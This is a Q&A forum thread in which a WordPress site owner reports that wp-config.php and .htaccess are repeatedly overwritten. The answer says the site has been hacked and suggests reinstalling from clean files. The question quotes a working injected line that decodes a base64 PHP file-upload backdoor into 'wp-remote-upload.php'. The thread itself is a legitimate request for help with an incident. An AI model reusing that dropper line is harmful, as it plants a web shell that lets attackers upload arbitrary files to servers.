Reputation: 10139
htaccess and wordpress config files are regularly over written
I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are over written with bad information.
This results in two problems - first the DB access details in wp-config are changed to something don't work, and then the ability to access my post-link permalinks are lost as a result of information being lost from htaccess.
After being overwritten, my wp-config file is full of lines like this:
file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));
My wp-config file has so many of these lines that it is about 800Kb in size.
The plugins I am using on my WordPress site are as follows:
- Akismet Anti-Spam [v4.0.1 by Automattic]
- Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
- Duplicator [v1.2.3 by Snap Creek]
- Google Analytics for WordPress [v7.7.1 by MonsterInsights]
- Hello Dolly [v1.6 by Matt Mullenweg]
- Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
- Logo Slider [v1.4.7 by EnigmaWeb]
- Recent Posts Widget Extended [v0.9.9.7 by Satrya]
- Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
- WordPress Importer [v0.6.3 by wordpressdotorg]
- Yoast SEO [v5.9.1 by Team Yoast]
Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to - however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.
How do I stop these files from being over written?
Or how I can discover what is responsible for changing these files?
Upvotes: 0
Views: 117
Answers (1)
Reputation: 5820
Looks like your system was compromised / hacked.
Suggest you start by googling what to do in such a case, there’s plenty of resources out there that cover the basics.
Ideally, you should probably delete all core WP and plugin folders, and upload the files again from a “clean” system (to avoid that other files that might have been inserted into your system can still be reached by the attacker from the outside.)
Upvotes: 1
Related Questions
- .htaccess files are repeatedly being created in File Directory
- .htaccess file modifying automatically
- Changes to .htaccess file keep crashing my Wordpress site
- htaccess issues with non exist files
- .htaccess and PHP files
- Two wild php files appear
- Unusual Code in almost each WordPress PHP File
- wordpress creates incorrect .htaccess
- Wordpress php file execution
- Error files being generated constantly at apache server